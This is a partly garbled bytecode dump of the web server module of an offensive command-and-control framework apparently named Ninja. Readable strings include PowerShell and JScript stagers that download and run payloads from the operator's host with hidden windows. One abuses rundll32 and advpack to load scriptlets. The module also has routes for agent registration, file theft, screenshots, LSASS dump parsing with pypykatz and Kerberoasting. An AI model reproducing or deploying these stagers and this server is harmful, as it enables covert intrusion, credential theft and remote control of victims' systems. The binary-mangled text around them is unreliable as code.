4iuddlZddlZddlZddlmZddlmZddlTddlTddl m Z ddl m Z ddl m Z ddlTddlmZddlTddlZejd Zeejd ZGd d eZeeZdagd dededede de!de"de#de$de%de&dzde'dzde(dzde)dzde*dzde+dzde,dzde-d zd!RZ.e/d d"g#d$Z0e/e-d zd"g#d%Z1d&Z2e/ed"g#d'Z3e/ed"g#d(Z4e/e d"g#d)Z5e/e"d"g#d*Ze/ed"g#d+Z6e/e!d"g#d,Z7e/e#d"g#d-Z8e/e&d.g#d/Z9e/e(d.g#d0Z:e/e%d"g#d1Z;e/e$d"g#d2Ze/e*d.g#d5Z?e/e+d.d"g#d6Z@e/e,d.g#d7ZAd8ZBdS)9N)datetime)mkdir)*)pypykatz)DA) Kerberoast)bcolorswerkzeugzMicrosoft-IIS/6.0ceZdZdZdS) localFlaskc$t|jd<|S)Nserver) SERVER_NAMEheaders)selfresponses "/home/kali/Ninja/core/webserver.pyprocess_responsezlocalFlask.process_responses%0"N)__name__ __module__ __qualname__rrrr r s#rr /indexpayloadpayloadcstagerstager52 payloadjfbase64 payloadjfssctmshtaz/(.*)infodownloaduploadimagecommandresultmodulesz.htmlfollinaGET)methodscdS)Nz/Oops... We Couldn't Find Your Page! (404 Error)rrrrrr0s  = s EG b''A+// #a&&[ b''A+//3r77^^ c"Q%jj( EQ;!  1XX  s2 ?33444"  OO 777  rctj}d|z}ttj|ztjzt S)Nz! [+] Powershell PAYLOAD Sent (%s))r2r3printr OKGREENENDCObfuscated_PAYLOADr7r8s rrrOs<  B 02 5E '/E !GL 0111   rctj}d|z}ttj|ztjzt S)N [+] STAGER PAYLOAD Send (%s))r2r3rQr rRrSSTAGERrUs rrrWs9  B ,r 1E '/E !GL 0111 88Orctj}d|z}ttj|ztjzd}t dkr|dtdtdtdtdtdd }n|dtdtdtdtdtdd }|S) NrWaC$s=(new-object net.webclient).DownloadString('{HTTP}://{ip}:{port}{b52payload}');$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));T{ip}{port}{raw} {b52payload}{HTTP}httpshttp) r2r3rQr rRrSSSLreplaceHOSTPORT raw_payload b52_payload)r7r8rs rrr_s   B ,r 1E '/E !GL 0111SF d{{--55hEEMMgWbcckk K)))0)M)MggV^`gNhNh --55hEEMMgWbcckk K)))0)M)MggV^`fNgNg  Mrctj}d|z}ttj|ztjzt jttd dS)Nz( [+] BASE64 Powershell PAYLOAD Send (%s)UTF-8) r2r3rQr rRrS base64mod b64encode bytearrayrTdecoderUs rr!r!nsc  B 7" >rctj}d|z}ttj|ztjzd}d}t dkr|dtdtdtdtd tdtd td td td t dd}n|dtdtdtdtd tdtd td td td t dd}t#jt'|d}|d|d}t#jt'|d}d|dz}|S)Nz, [+] Powershell JOB + File PAYLOAD Send (%s)a($V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('{HTTP}://{ip}:{port}{b52payload}');set-content -path c:\programdata\a.zip -value $S;set-content -path c:\programdata\b.ps1 -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')));Start-Process powershell -ArgumentList "-exec bypass -w 1 -file c:\programdata\b.ps1" -WindowStyle Hidden;start-sleep 10;del c:\programdata\a.zip;del c:\programdata\b.ps1;$s=(get-content C:\\ProgramData\\a.zip);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));TrZr[r\r] {b64stager}{hjf}{hjfs}{sct}{hta}r^r_r`rh {payload}oStart-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('%s')))})r2r3rQr rRrSrarbrcrdrerf b64_stager hjf_payload hjfs_payload sct_payload hta_payloadrirjrkrlr7r8rcommandFs rr r s  B ;b @E '/E !GL 0111G GpH d{{//&$//77$GGOOPWYdeemm K)))0 )K)KGGTbT_MaMaahahipitbvbvv}v} lw$w$$+GG[$A$A'''S^B_B_`g`ghphoaqaq //&$//77$GGOOPWYdeemm K)))0 )K)KGGTbT_MaMaahahipitbvbvv}v} lw$w$$+GG[$A$A'''S^B_B_`g`ghphnapap  "9Xw#?#?@@Hook8??7+C+CDDG!)GW"="=>>GCJCQCQCCG Nrctj}d|z}ttj|ztjzd}d}|dtdtdtdtdtdtd td td td t}t!jt%|d }|d|d }t!jt%|d }d|d z}|S)Nz1 [+] Powershell JOB + File +SCT PAYLOAD Send (%s)a$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}{b52payload}');set-content -path c:\programdata\a.zip -value $S;$S=$V.DownloadString('http://{ip}:{port}{sct}');set-content -path c:\programdata\sct.zip -value $S;set-content -path c:\programdata\sct.ps1 -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')));set-content -path c:\programdata\sct.ini -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W3ZlcnNpb25dDQpTaWduYXR1cmU9JGNoaWNhZ28kDQoNCltFeGNlbF0NClVuUmVnaXN0ZXJPQ1hzPUV2ZW50TWFuYWdlcg0KDQpbRXZlbnRNYW5hZ2VyXQ0KJTExJVxzY3JvYmouZGxsLE5JLGM6L3Byb2dyYW1kYXRhL3NjdC56aXANCg0KW1N0cmluZ3NdDQpBcHBBY3QgPSAiU09GVFdBUkVcTWljcm9zb2Z0XENvbm5lY3Rpb24gTWFuYWdlciINClNlcnZpY2VOYW1lPSIgIg0KU2hvcnRTdmNOYW1lPSIgIg==')));start-process rundll32.exe -ArgumentList "advpack.dll,LaunchINFSection C:\ProgramData\sct.ini,Excel,1," -WindowStyle Hidden;start-sleep 30;del c:\programdata\a.zip;del c:\programdata\sct.ps1;del c:\programdata\sct.zip;del c:\programdata\sct.ini;rorZr[r\r]rprqrrrsrtrhrurv)r2r3rQr rRrSrbrcrdrerfrwrxryrzr{rirjrkrlr|s rr"r"s  B @2 EE '/E !GL 0111vGpHoofd++33HdCCKKGU`aaii %%%,W]J%G%GP^`kHlHlmtmtnn%gh ==ggg{>[>[\c\cdkdo]q]q "9Xw#?#?@@Hook8??7+C+CDDG!)GW"="=>>GCJCQCQCCG NrPOSTc g}tjD]}||tj|dddkr1tj|d}tj|d}n0tj|d}tj|d}t| ||d}tj}|d||dttdza dtdz ||d|dfz}ttj |ztj zt||it|git |t#jit$S) Nr>img.jpegrz**z( [+] New Agent Connected(%d): %s - %s\%s)r2formrGfindAGENTSgetsplitr3insertCOUNTrQr rRrSupdateCOMMANDTIMEtimeAESKey)argsrMiddatar7r8s rr%r%s " D \ A|DG!!*--22 \$q' "|DG$|DG$ \$q' " zz"~~$"2zz$   Ar Au < >@>B1g>B1g@GG go% 4555 r4j!!!Bx    R%&&& Mrcv g}tjD]}||tjd}tjd}t||t t |dd}t| ddkr/|dd dd }ttd |d dzd }| }tt |}d |z}tt j|zt jz|SdS#t&$r*}tdt)|zYd}~dSd}~wwxYw)Nfileresource +\r"rBrz/file/rbz [+] uploaded file %sErrorz [-] Download: )r2rrGrrdecryptrstriprbrCrr4 campaign_namer5encryptrQr rRrS Exceptionstr)rrMnamerfprr8es rr'r's  A KKNNNN |F# \* % ::b>> %$*:64::<<#7#7S#A#ABBD4::d##$$q((||D"--33D99"=...eR1H1HH$OOB7799D64((D,t3E '/E)GL8 9 9 9Kw   3q66)***rrrrrsE?F F8F33F8c tj}d|z}ttj|ztjzd}d}|dtdtdtdtdtdtd td td td t}t!jt%|d d }ddgddgddgddgddgddgddgddgddgd d!gd"d#gd$d%gg }|D]$}||d&|d'}% t)d(n#t*$rYnwxYwt-d)d*}||d+|||d+|S),Nz' [+] New Agent Request HTA PAYLOAD (%s)a aA var cm="powershell -w hidden Invoke-Expression(New-Object Net.WebClient).DownloadString('http://{ip}:{port}{b64stager}');"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null); rZr[r\r]rprqrrrsrtrh]=[a,b@D-x~NrE%C$H!G{K}Or>rz./utils/payloads/Webserverz!utils/payloads/Webserver/mshta.jsw{code})r2r3rQr rRrSrbrcrdrerfrwrxryrzr{rirjrkrlrFileExistsErrorr4writer6)r7r8codejsrerMrs rr$r$sG  B 6 ;E '/E !GL 0111 ^!D cB FD ! ! ) )(D 9 9 A A'; W W _ _`n`k m mmtmtzn#n##*7>;#G#GPWYdHeHefmfmnvnzg|g|}D}D}}%gg{;;   Yr733 4 4 ; ;G D DB * * * * * * * * * * * * B$$ ZZ!ad # #  *++++      6<G GGc |j}d|z}ttj|ztjzd}d}|dt dtdtdtdtdtd td td td t}|d dd}ddgddgddgddgddgddgddgddgd d!gd"d#gd$d%gd&d'gg }|D]$}||d(|d)}%|d*|S)+Nz' [+] New Agent Request SCT PAYLOAD (%s)a  a  var cm="powershell -exec bypass -w 1 -file c:\\programdata\\sct.ps1"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null); rZr[r\r]rprqrrrsrtr! rBrrrrrrrrrrrrrrrrrrrrrrrrr>rr)r3rQr rRrSrbrcrdrerfrwrxryrzr{encode)r2r7r8rrrrMs rr#r#!s  B 6 ;E '/E !GL 0111 VD oB FD ! ! ) )(D 9 9 A A'; W W _ _`n`k m mmtmtzn#n##*7>;#G#GPWYdHeHefmfmnvnzg|g|}D}D}}%gg{;;  8   $ $T2 . .B * * * * * * * * * * * * B$$ ZZ!ad # # <<" % %%rcg}tjD]}||tjd}tjd}t||tjd}tjd}t t |dd}ttd|zd}| || dt|d t|d t|fz}ttj|ztjzd Sd S) Ndrfrr /downloads/wbz( [+] Agent (%d) - %s send open(%s bytes)rrOKzNo file recieved)r2rrGrr decrypt_filerrrbr4rrr6rCrQr rRrS)rrMrrfilename filecontentrr8s rr&r&As- D \ A < D j !Bzz"~~!d&6<$l3' "6;+<+<+>+>+F+FsC+P+PQQ ]///(:D A A   ;vbz!}fUWjYZm]`ae]f]f>gg go% 4555t  rc.g}tjD]}||tj|dddkr1tj|d}tj|d}n0tj|d}tj|d}|ddt dDz}t ||tt| dd  d d d d}ttd |zd }|||d t |dt |dt#|fz}t%t&j|zt&jzdS)Nr>rrrrBc3^K|](}ttjV)dS)N)randomchoicestringascii_lowercase.0rMs r zimage..ls1NNfmmF$:;;NNNNNNrrr:z/images/%s.pngrz) [+] Agent (%d) - %s send image(%s bytes)rr)r2rrGrrIrErrrrrrbrr4rrr6rCrQr rRrS)rrMrrfnrr8s rr(r(\s D \ A|DG!!*--22 \$q' "|DG$|DG$ \$q' " bggNNU1XXNNNNN NB zz"~~!d&6FDJJLL$8$8c$B$B$H$H$M$Ma$P$V$VWZ$[$[\]$^__ ]222R7 > >   <r 1 vVXzZ[}^abf^g^g?hh go% 4555 4rcRg}tjD]}||tj|dddkrtj|d}ntj|d}t|t jt|<t|tt|dkrt| d}tj dz|zdztt|ztjz}t!|t#dd}|d|zdztt|zd z||St|1t!tj dz|zd ztjzd St)t+jt/d d }t/dd}ddt3|Ddzddt3|DzS)Nrrrr>z[~] rlogs/c2-logs.txtrrz :RegisterREGISTERdPrBcVg|]&}ttj'Srrrrascii_uppercasers r zcommand..s'TTT! f&<==TTTrz-*-*-*cVg|]&}ttj'Srrrs rrzcommand..s' I I IqV]]61 2 2 I I Ir)r2rrGrrrrrrCrpopr rRrrrSrQr4rr6seedrnowrandintrIrE)rrMrcmdouthistoryrand1rand2s rr)r)ws* D \ A|DG!!*--22 \$q' " \$q' " zz"~~!9;;R zz"~~!c'++b//&:&:Q&>&>bkooa  o&+c1GFC4H4HH7<W c )3// frkC''&#*>*>>EFFF  B  go&+k9GLHIIIz X\^^S!!C  wwTTuU||TTTUUX``cecjcj I IE%LL I I IdKdKK KrcT g}tjD]}||tj|dddkr1tj|d}tj|d}n0tj|d}tj|d}t|dkr|dkrt t|dd}| dd}d t|dt|d t|d t|d fz}td d}| |dz| | ddddz| | dddkrt| ddtdt|d zdzt|d zdz}t|d}| | ddd| t!jt$j|f}|dS| dddkr(t| ddtdt|d zdzt|d zdz}t|d} | | ddd| t!jt*j|t|d t|d f}|dS| dddkrtdt|d zdzt|d zdz}t|d} | | ddddd| tdt|d zdz}t|d } | t1j| ddddd| t5jtdt|d zdz} | jD])} tt;| j| *dStt<j|zt<j zt| dnd!Sd"S)#Nr>rrrrrasciiignorez& [+] Agent (%d) - %s@%s\%s send ResultrrrrrrrhrDefense_Ananylsis_Modulez/DA/rz DA_out.txtrtargetrrzKerberoast-Modulez /kerberoast/z _kerb_out.txtzDump_start_from_here:rzsafetydump.dmpzsafetydump-decoded.dmprrok)!r2rrGrrrrrrbrr4rrlr6rQr threadingThreadrmainstartrkerbrri b64decoderparse_minidump_filelogon_sessionsrr rRrS) rrMrrr8rfnamedarkmimiluids rr*r*s D\ A|DG!!*--22 \$q' "|DG$|DG$ \$q' " zz"~~$$,,vt||C5566{{7H--:fRjmVTVZXY]\bce\fgh\ikqrtkuvwkx=yy)3// edl### dkk'**225#>>EFFF  ;;w   $ $%? @ @2 E E $++g&&++,FGG H H H$***VBZ]:S@6":a=PS__EeS!!B HHT[[))11%== > > > HHJJJ%RWE8DDDF LLNNN4 ;;w   $ $%8 9 9B > > $++g&&++,?@@ A A A$222VBZ]BSH6RT:VW=X[jjEUC  A GGDKK((00<< = = = GGIII%Z_E6RT:VW=Z`acZdefZgCijjjF LLNNN4 ;;w   $ $%< = = B B$111F2JqMACG&QS*UV-WZjjEUC  A GGDKK((00<<BBCZ[[\]^ _ _ _ GGIII$111F2JqMAD\\EUD!!A GGI' G(<(<(D(DUC(P(P(V(VWn(o(opq(rss t t t GGIII/=0M0M0MPVWYPZ[\P]0]`x0xyyD+ 6 6c$-d34455554 go% 4555 dkk'""####z 4rcg}tjD]}||tj|dddkr1tj|d}tj|d}n0tj|d}tj|d}d}t|+|(t t|dddd}d |d t|dd t|d d }ttj |ztj z td|zd}|}|dkrtj|}t#t|}||S#t&$r} t| Yd} ~ dSd} ~ wwxYwdS)Nr>rrrrrrrBz [+] New Agent Request Module z (z - r)zModules/r11r)r2rrGrrrrrrbrQr rRrSr4r5rirjrr6r) rrMrrb64r8fpmmoduleretmodrs rr+r+s D \ A|DG!!*--22 \$q' "|DG$|DG$ \$q' " C zz"~~!d&6vt||C5566>>ubIIAEvbzRS}}}V\]_V`abVcVcVcd go% 4555 zD(#..CXXZZFczz",V44VV,,F IIKKKM    !HHH22222  4s,A+G G<"G77G<cn trWdtg}dttfi}t jt j||}d|_| dSdtg}t jt j|}d|_| dS#t$rYdSwxYw)Nz0.0.0.0 ssl_context)rrkwargsTr) rardCERTKEYrrapprundaemonrKeyboardInterrupt)hostcertthreads rrrs  t$D!D#;/D%SWD$OOOF FM LLNNNNNt$D%SWDBBBF FM LLNNNNN      sAB& AB&& B43B4)Cr!rirrrosrrflaskpypykatz.pypykatzrcorerrcore.Encryption core.colorr core.configlogging getLoggerlogsetLevelERRORrFlaskr rrrrerfrw b52_stagerrx b64_payloadryrzr{ register_url download_url upload_url image_url command_url result_url modules_url follina_urlurlsrouterr,rOrrrrr r"r%r'r$r#r&r(r)r*r+rrrrr3s? &&&&&&g ## W]! j  HHWHkH9HkH:HzHS[H]gHisHH H"-H/7H9EHGSHU`HbgHitHH'H)/H1=1GHISHU_biUiHksH GH%H'2G&;H>GHISU\H\H_gH g H ) H*5W)< H>G HH3  ==! =;w 0010";((  )( :w''(':w''  (' ;((YY)(Y;(()(;(()(:<%))*)&<&**##+*#L:x(()(<;(($&$&)($&N;((&&)(&><&**+*49vh''('4;)) K K*) KF://==0/=@;))""*)"J     r